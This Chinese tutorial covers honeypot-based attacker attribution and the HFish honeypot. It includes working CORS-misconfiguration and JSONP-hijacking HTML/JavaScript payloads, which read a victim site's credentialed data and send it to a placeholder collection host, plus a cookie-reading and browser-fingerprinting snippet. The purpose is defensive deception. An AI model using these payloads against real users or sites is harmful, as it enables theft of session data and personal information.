蜜罐溯源与HFish蜜罐使用详解

一、蜜罐技术基础

1.1 蜜罐定义与原理

蜜罐技术是一种对攻击方进行欺骗的技术，通过布置作为诱饵的主机、网络服务或信息，诱使攻击方实施攻击，从而捕获和分析攻击行为。

核心价值：

• 捕获攻击行为
• 分析攻击工具与方法
• 推测攻击意图和动机
• 增强实际系统安全防护能力

1.2 蜜罐溯源技术

蜜罐溯源是通过反向追踪技术对网络攻击源头进行定位和追踪，以发现攻击者的真实身份和意图。

类比：类似于警察通过监控摄像头追踪小偷的过程。

二、Web蜜罐个人信息收集技术

2.1 同源策略(Same-Origin Policy)

定义：由Netscape提出的安全策略，限制从同一源加载的文档或脚本如何与另一源的资源交互。

同源判断标准：

• protocol(http/https)
• port(如有指定)
• host

三者完全相同则为同源，否则为非同源。

例外情况：带src属性的标签(img, script等)不受同源策略限制。

2.2 CORS(跨域资源共享)

定义：Cross-Origin Resource Sharing，一种Web应用程序中进行跨域请求的安全机制。

工作原理：

• 服务器在HTTP响应头中添加特定标头
• 指示允许的跨域请求来源、HTTP方法和头信息
• 浏览器检查这些响应头决定是否允许跨域请求

关键响应头：

• Access-Control-Allow-Origin
• Access-Control-Allow-Methods
• Access-Control-Allow-Headers

2.3 CORS漏洞利用

当网站CORS配置错误时会产生漏洞，成为蜜罐的利用点。

CORS漏洞演示步骤：

1. 搭建DoraBox靶场
2. 配置网站仅允许本地访问
3. 利用CORS漏洞制作简易蜜罐
4. 模拟黑客踩蜜罐并捕获信息

示例蜜罐代码：

<!DOCTYPE html>
<html>
<head>
    <title>CORS TEST</title>
</head>
<body>
    <div id='output'></div>
    <script type="text/javascript">
        var req = new XMLHttpRequest();
        req.onload = reqListener;
        req.open('get', '有CORS漏洞的网站', true);
        req.withCredentials = true;
        req.send();
        
        function reqListener() {
            new Image().src = "http://蜜罐服务器IP:10002/" + 
                window.btoa(unescape(encodeURIComponent(JSON.stringify(req.responseText))));
        }
    </script>
</body>
</html>

2.4 JSONP劫持

JSONP(JSON with Padding)是一种跨域获取资源的技术手段。

JSONP劫持原理：

• 利用script标签可跨域的特性
• 网站B对网站A的JSONP请求未安全检查
• 网站A利用漏洞获取用户在网站B上的数据

JSONP漏洞演示代码：

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>JSONP EXP跨域测试</title>
</head>
<body>
    <script>
        function test(json){
            new Image().src = "http://蜜罐服务器IP:10002/" + JSON.stringify(json);
        }
    </script>
    <script src="有jsonp漏洞的网站url callback=test"></script>
</body>
</html>

三、JavaScript获取敏感信息方法

// 获取cookie
document.cookie

// 获取当前URL
window.location.href

// 获取当前路径
window.location.pathname

// 加载新页面
window.location.assign("http://xxxx")

// 浏览器信息收集
txt = "<p>浏览器代号: " + navigator.appCodeName + "</p>";
txt += "<p>浏览器名称: " + navigator.appName + "</p>";
txt += "<p>浏览器版本: " + navigator.appVersion + "</p>";
txt += "<p>启用Cookies: " + navigator.cookieEnabled + "</p>";
txt += "<p>硬件平台: " + navigator.platform + "</p>";
txt += "<p>用户代理: " + navigator.userAgent + "</p>";
txt += "<p>用户代理语言: " + navigator.language + "</p>";

// 弹窗
alert("hello");

// 确认弹窗
confirm("xxx");

// 输入框
prompt("请输入你的名字", "Harry Potter");

四、HFish蜜罐使用指南

4.1 HFish基本信息

HFish是一款社区型免费的中低交互蜜罐，侧重企业安全场景，具有以下功能：

• 内网失陷检测
• 外网威胁感知
• 威胁情报生产

4.2 安装与登录

1. 安装完成后访问：https://127.0.0.1:4433/web/login
2. 默认账号：admin
3. 默认密码：HFish2021
4. 支持中文界面切换

4.3 主要功能模块

A. 节点管理

• 查看已开启的蜜罐及对应端口
• 示例：8080端口部署的海康摄像头蜜罐

B. 攻击列表

• 记录所有攻击尝试
• 示例：对海康摄像头蜜罐的SQL注入攻击
• 点击"+"查看攻击详细信息

C. 攻击来源

• 分析攻击来源信息

D. 服务管理

• 查看蜜罐列表及功能说明
• 支持上传自定义蜜罐

E. 漏洞模拟

• 模拟各种漏洞环境

F. 高交互蜜罐

• 高级蜜罐功能

4.4 安全建议

渗透测试时采取以下措施减少蜜罐危害：

• 使用无痕模式
• 在虚拟机中进行测试
• 避免使用已登录敏感账户的浏览器

五、总结

蜜罐技术是网络安全防御的重要组成部分，通过：

1. 理解同源策略和跨域机制
2. 掌握CORS和JSONP漏洞利用方法
3. 熟练使用HFish等蜜罐工具
4. 采取适当防护措施

可以有效提升组织的安全防护能力和威胁感知能力。